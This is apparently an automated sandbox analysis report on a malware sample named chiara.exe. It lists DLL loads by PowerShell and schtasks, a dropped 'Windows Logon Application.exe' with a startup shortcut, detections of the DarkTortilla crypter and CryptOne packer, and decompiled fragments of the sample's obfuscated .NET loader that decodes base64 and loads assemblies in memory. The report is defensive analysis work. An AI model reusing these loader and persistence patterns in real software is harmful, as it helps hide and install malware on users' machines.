Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: xmllite.dll
Source: C:\Users\user\AppData\Roaming\Windows Logon Application.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\Windows Logon Application.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\Windows Logon Application.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\Windows Logon Application.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\Windows Logon Application.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\Windows Logon Application.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\Windows Logon Application.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\Windows Logon Application.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Roaming\Windows Logon Application.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\Windows Logon Application.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\Windows Logon Application.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\Windows Logon Application.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\Windows Logon Application.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\Windows Logon Application.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\Windows Logon Application.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\Windows Logon Application.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\Windows Logon Application.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\Windows Logon Application.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\Windows Logon Application.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\Windows Logon Application.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Roaming\Windows Logon Application.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\Windows Logon Application.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\Windows Logon Application.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\Windows Logon Application.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\Windows Logon Application.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\Windows Logon Application.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\Windows Logon Application.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\Windows Logon Application.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\Windows Logon Application.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\Windows Logon Application.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\Windows Logon Application.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\Windows Logon Application.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Roaming\Windows Logon Application.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\Windows Logon Application.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\Windows Logon Application.exe	Section loaded: cryptbase.dll

Source: C:\Users\user\Desktop\chiara.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{00BB2765-6A77-11D0-A535-00C04FD7D062}\InProcServer32

Jump to behavior

Source: Windows Logon Application.lnk.21.dr

LNK file: ..\..\..\..\..\Windows Logon Application.exe

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\AppData\Local\Temp\RarSFX0\shost.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Source: chiara.exe

Static file information: File size 1406359 > 1048576

Source:	Binary string: InstallUtil.pdb\rvr hr_CorExeMainmscoree.dll source: Windows Logon Application.exe, 00000025.00000000.2877182211.0000000000B82000.00000002.00000001.01000000.0000001B.sdmp, Windows Logon Application.exe.21.dr
Source:	Binary string: D:\Projects\WinRAR\sfx\build\sfxrar64\Release\sfxrar.pdb source: chiara.exe, chiara.exe .0.dr
Source:	Binary string: InstallUtil.pdb source: Windows Logon Application.exe, 00000025.00000000.2877182211.0000000000B82000.00000002.00000001.01000000.0000001B.sdmp, Windows Logon Application.exe.21.dr

Data Obfuscation

Detected CryptOne packer

Source: C:\Windows\Resources\svchost.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{B196B287-BAB4-101A-B69C-00AA00341D07}\ProxyStubClsid32

Jump to behavior

Yara detected DarkTortilla Crypter

Source: Yara match	File source: 11.2.shost.exe.4540818.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.shost.exe.59d0000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.shost.exe.4540818.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.shost.exe.44287b8.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.shost.exe.59d0000.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.shost.exe.44287b8.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000B.00000002.2577651700.00000000059D0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2572034544.00000000043CB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2572034544.000000000453F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2538242356.0000000003311000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: shost.exe PID: 744, type: MEMORYSTR

.NET source code contains method to dynamically call methods (often used by packers)

Source: 11.2.shost.exe.477b518.3.raw.unpack, IvZW7guxNL9u9GK8CGlbF6Dlkc6WS9b1wN97yDqCN4ap1z3QrMe.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{q3DRJkDM1M5omu3Tac.G6NlvZ3bdZE3kd99H0,q3DRJkDM1M5omu3Tac.ZVzLdIq5hxkm0rXAMz,q3DRJkDM1M5omu3Tac.XpFkJf1eXteCoz1cav,q3DRJkDM1M5omu3Tac._36GB1dtxdYqYIhWXOo,_7tBelVGdfCaQIjsR4NrUVA0ALzDaQiOg03ja.ycyZJPcoFJ3vj8sZSqsToS4qEAderOsDZd2c()}}, (string[])null, (Type[])null, (bool[])null, true)
Source: 11.2.shost.exe.477b518.3.raw.unpack, IvZW7guxNL9u9GK8CGlbF6Dlkc6WS9b1wN97yDqCN4ap1z3QrMe.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{_9T5ZdcPtOslKUtlRlb5V8n7smpVqVcNbb74TdxkL8YE4ppOUtkl[2],_7tBelVGdfCaQIjsR4NrUVA0ALzDaQiOg03ja.iHG0jy2FPNi5Rze0KnPG51oM3tTvDDaD92N4(Convert.FromBase64String(_9T5ZdcPtOslKUtlRlb5V8n7smpVqVcNbb74TdxkL8YE4ppOUtkl[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
Source: 11.2.shost.exe.46aa52a.6.raw.unpack, IvZW7guxNL9u9GK8CGlbF6Dlkc6WS9b1wN97yDqCN4ap1z3QrMe.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{q3DRJkDM1M5omu3Tac.G6NlvZ3bdZE3kd99H0,q3DRJkDM1M5omu3Tac.ZVzLdIq5hxkm0rXAMz,q3DRJkDM1M5omu3Tac.XpFkJf1eXteCoz1cav,q3DRJkDM1M5omu3Tac._36GB1dtxdYqYIhWXOo,_7tBelVGdfCaQIjsR4NrUVA0ALzDaQiOg03ja.ycyZJPcoFJ3vj8sZSqsToS4qEAderOsDZd2c()}}, (string[])null, (Type[])null, (bool[])null, true)
Source: 11.2.shost.exe.46aa52a.6.raw.unpack, IvZW7guxNL9u9GK8CGlbF6Dlkc6WS9b1wN97yDqCN4ap1z3QrMe.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{_9T5ZdcPtOslKUtlRlb5V8n7smpVqVcNbb74TdxkL8YE4ppOUtkl[2],_7tBelVGdfCaQIjsR4NrUVA0ALzDaQiOg03ja.iHG0jy2FPNi5Rze0KnPG51oM3tTvDDaD92N4(Convert.FromBase64String(_9T5ZdcPtOslKUtlRlb5V8n7smpVqVcNbb74TdxkL8YE4ppOUtkl[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
Source: 11.2.shost.exe.46fdeda.2.raw.unpack, IvZW7guxNL9u9GK8CGlbF6Dlkc6WS9b1wN97yDqCN4ap1z3QrMe.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{q3DRJkDM1M5omu3Tac.G6NlvZ3bdZE3kd99H0,q3DRJkDM1M5omu3Tac.ZVzLdIq5hxkm0rXAMz,q3DRJkDM1M5omu3Tac.XpFkJf1eXteCoz1cav,q3DRJkDM1M5omu3Tac._36GB1dtxdYqYIhWXOo,_7tBelVGdfCaQIjsR4NrUVA0ALzDaQiOg03ja.ycyZJPcoFJ3vj8sZSqsToS4qEAderOsDZd2c()}}, (string[])null, (Type[])null, (bool[])null, true)
Source: 11.2.shost.exe.46fdeda.2.raw.unpack, IvZW7guxNL9u9GK8CGlbF6Dlkc6WS9b1wN97yDqCN4ap1z3QrMe.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{_9T5ZdcPtOslKUtlRlb5V8n7smpVqVcNbb74TdxkL8YE4ppOUtkl[2],_7tBelVGdfCaQIjsR4NrUVA0ALzDaQiOg03ja.iHG0jy2FPNi5Rze0KnPG51oM3tTvDDaD92N4(Convert.FromBase64String(_9T5ZdcPtOslKUtlRlb5V8n7smpVqVcNbb74TdxkL8YE4ppOUtkl[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
Source: 11.2.shost.exe.475185a.4.raw.unpack, IvZW7guxNL9u9GK8CGlbF6Dlkc6WS9b1wN97yDqCN4ap1z3QrMe.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{q3DRJkDM1M5omu3Tac.G6NlvZ3bdZE3kd99H0,q3DRJkDM1M5omu3Tac.ZVzLdIq5hxkm0rXAMz,q3DRJkDM1M5omu3Tac.XpFkJf1eXteCoz1cav,q3DRJkDM1M5omu3Tac._36GB1dtxdYqYIhWXOo,_7tBelVGdfCaQIjsR4NrUVA0ALzDaQiOg03ja.ycyZJPcoFJ3vj8sZSqsToS4qEAderOsDZd2c()}}, (string[])null, (Type[])null, (bool[])null, true)
Source: 11.2.shost.exe.475185a.4.raw.unpack, IvZW7guxNL9u9GK8CGlbF6Dlkc6WS9b1wN97yDqCN4ap1z3QrMe.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{_9T5ZdcPtOslKUtlRlb5V8n7smpVqVcNbb74TdxkL8YE4ppOUtkl[2],_7tBelVGdfCaQIjsR4NrUVA0ALzDaQiOg03ja.iHG0jy2FPNi5Rze0KnPG51oM3tTvDDaD92N4(Convert.FromBase64String(_9T5ZdcPtOslKUtlRlb5V8n7smpVqVcNbb74TdxkL8YE4ppOUtkl[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
Source: 11.2.shost.exe.46d420a.5.raw.unpack, IvZW7guxNL9u9GK8CGlbF6Dlkc6WS9b1wN97yDqCN4ap1z3QrMe.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{q3DRJkDM1M5omu3Tac.G6NlvZ3bdZE3kd99H0,q3DRJkDM1M5omu3Tac.ZVzLdIq5hxkm0rXAMz,q3DRJkDM1M5omu3Tac.XpFkJf1eXteCoz1cav,q3DRJkDM1M5omu3Tac._36GB1dtxdYqYIhWXOo,_7tBelVGdfCaQIjsR4NrUVA0ALzDaQiOg03ja.ycyZJPcoFJ3vj8sZSqsToS4qEAderOsDZd2c()}}, (string[])null, (Type[])null, (bool[])null, true)
Source: 11.2.shost.exe.46d420a.5.raw.unpack, IvZW7guxNL9u9GK8CGlbF6Dlkc6WS9b1wN97yDqCN4ap1z3QrMe.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{_9T5ZdcPtOslKUtlRlb5V8n7smpVqVcNbb74TdxkL8YE4ppOUtkl[2],_7tBelVGdfCaQIjsR4NrUVA0ALzDaQiOg03ja.iHG0jy2FPNi5Rze0KnPG51oM3tTvDDaD92N4(Convert.FromBase64String(_9T5ZdcPtOslKUtlRlb5V8n7smpVqVcNbb74TdxkL8YE4ppOUtkl[3]))}}, (string[])null, (Type[])null, (bool[])null, true)

.NET source code contains potential unpacker

Source: 11.2.shost.exe.477b518.3.raw.unpack, IvZW7guxNL9u9GK8CGlbF6Dlkc6WS9b1wN97yDqCN4ap1z3QrMe.cs	.Net Code: rWdXMj4gSyVJuyZUVbNH1YC1pPDg6fSnottWFY6z1ttxBRJsyuB System.AppDomain.Load(byte[])
Source: 11.2.shost.exe.477b518.3.raw.unpack, IvZW7guxNL9u9GK8CGlbF6Dlkc6WS9b1wN97yDqCN4ap1z3QrMe.cs	.Net Code: Dgl3fWhDwl37AB4JoclTh07TA7eMTLLMFKDEnrIBRyJDRPPqnA3 System.AppDomain.Load(byte[])
Source: 11.2.shost.exe.477b518.3.raw.unpack, IvZW7guxNL9u9GK8CGlbF6Dlkc6WS9b1wN97yDqCN4ap1z3QrMe.cs	.Net Code: Dgl3fWhDwl37AB4JoclTh07TA7eMTLLMFKDEnrIBRyJDRPPqnA3
Source: 11.2.shost.exe.46aa52a.6.raw.unpack, IvZW7guxNL9u9GK8CGlbF6Dlkc6WS9b1wN97yDqCN4ap1z3QrMe.cs	.Net Code: rWdXMj4gSyVJuyZUVbNH1YC1pPDg6fSnottWFY6z1ttxBRJsyuB System.AppDomain.Load(byte[])
Source: 11.2.shost.exe.46aa52a.6.raw.unpack, IvZW7guxNL9u9GK8CGlbF6Dlkc6WS9b1wN97yDqCN4ap1z3QrMe.cs	.Net Code: Dgl3fWhDwl37AB4JoclTh07TA7eMTLLMFKDEnrIBRyJDRPPqnA3 System.AppDomain.Load(byte[])
Source: 11.2.shost.exe.46aa52a.6.raw.unpack, IvZW7guxNL9u9GK8CGlbF6Dlkc6WS9b1wN97yDqCN4ap1z3QrMe.cs	.Net Code: Dgl3fWhDwl37AB4JoclTh07TA7eMTLLMFKDEnrIBRyJDRPPqnA3
Source: 11.2.shost.exe.46fdeda.2.raw.unpack, IvZW7guxNL9u9GK8CGlbF6Dlkc6WS9b1wN97yDqCN4ap1z3QrMe.cs	.Net Code: rWdXMj4gSyVJuyZUVbNH1YC1pPDg6fSnottWFY6z1ttxBRJsyuB System.AppDomain.Load(byte[])
Source: 11.2.shost.exe.46fdeda.2.raw.unpack, IvZW7guxNL9u9GK8CGlbF6Dlkc6WS9b1wN97yDqCN4ap1z3QrMe.cs	.Net Code: Dgl3fWhDwl37AB4JoclTh07TA7eMTLLMFKDEnrIBRyJDRPPqnA3 System.AppDomain.Load(byte[])
Source: 11.2.shost.exe.46fdeda.2.raw.unpack, IvZW7guxNL9u9GK8CGlbF6Dlkc6WS9b1wN97yDqCN4ap1z3QrMe.cs	.Net Code: Dgl3fWhDwl37AB4JoclTh07TA7eMTLLMFKDEnrIBRyJDRPPqnA3
Source: 11.2.shost.exe.475185a.4.raw.unpack, IvZW7guxNL9u9GK8CGlbF6Dlkc6WS9b1wN97yDqCN4ap1z3QrMe.cs	.Net Code: rWdXMj4gSyVJuyZUVbNH1YC1pPDg6fSnottWFY6z1ttxBRJsyuB System.AppDomain.Load(byte[])
Source: 11.2.shost.exe.475185a.4.raw.unpack, IvZW7guxNL9u9GK8CGlbF6Dlkc6WS9b1wN97yDqCN4ap1z3QrMe.cs	.Net Code: Dgl3fWhDwl37AB4JoclTh07TA7eMTLLMFKDEnrIBRyJDRPPqnA3 System.AppDomain.Load(byte[])
Source: 11.2.shost.exe.475185a.4.raw.unpack, IvZW7guxNL9u9GK8CGlbF6Dlkc6WS9b1wN97yDqCN4ap1z3QrMe.cs	.Net Code: Dgl3fWhDwl37AB4JoclTh07TA7eMTLLMFKDEnrIBRyJDRPPqnA3
Source: 11.2.shost.exe.46d420a.5.raw.unpack, IvZW7guxNL9u9GK8CGlbF6Dlkc6WS9b1wN97yDqCN4ap1z3QrMe.cs	.Net Code: rWdXMj4gSyVJuyZUVbNH1YC1pPDg6fSnottWFY6z1ttxBRJsyuB System.AppDomain.Load(byte[])
Source: 11.2.shost.exe.46d420a.5.raw.unpack, IvZW7guxNL9u9GK8CGlbF6Dlkc6WS9b1wN97yDqCN4ap1z3QrMe.cs	.Net Code: Dgl3fWhDwl37AB4JoclTh07TA7eMTLLMFKDEnrIBRyJDRPPqnA3 System.AppDomain.Load(byte[])
Source: 11.2.shost.exe.46d420a.5.raw.unpack, IvZW7guxNL9u9GK8CGlbF6Dlkc6WS9b1wN97yDqCN4ap1z3QrMe.cs	.Net Code: Dgl3fWhDwl37AB4JoclTh07TA7eMTLLMFKDEnrIBRyJDRPPqnA3

Source: C:\Users\user\Desktop\chiara.exe

File created: C:\Users\user\AppData\Local\Temp\RarSFX0\__tmp_rar_sfx_access_check_4495359

Jump to behavior

Source: explorer.exe.3.dr	Static PE information: real checksum: 0x4bf451a should be: 0x2261f
Source: icsys.icn.exe.0.dr	Static PE information: real checksum: 0x4bf451a should be: 0x24774
Source: chiara.exe .0.dr	Static PE information: real checksum: 0x71023 should be: 0x142ca2
Source: spoolsv.exe.4.dr	Static PE information: real checksum: 0x4bf451a should be: 0x2c5f7
Source: chiara.exe	Static PE information: real checksum: 0x4bf451a should be: 0x15eaa1
Source: shost.exe.2.dr	Static PE information: real checksum: 0x0 should be: 0xf621d
Source: svchost.exe.7.dr	Static PE information: real checksum: 0x4bf451a should be: 0x23509

Source: chiara.exe .0.dr	Static PE information: section name: .didat
Source: chiara.exe .0.dr	Static PE information: section name: _RDATA

Source: C:\Users\user\Desktop\chiara.exe	Code function: 2_2_00007FF6CCCC5166 push rsi; retf	2_2_00007FF6CCCC5167
Source: C:\Users\user\Desktop\chiara.exe	Code function: 2_2_00007FF6CCCC5156 push rsi; retf	2_2_00007FF6CCCC5157
Source: C:\Users\user\Desktop\chiara.exe	Code function: 2_2_00007FF6CCCEE258 push 0000000Fh; retf	2_2_00007FF6CCCEE25A
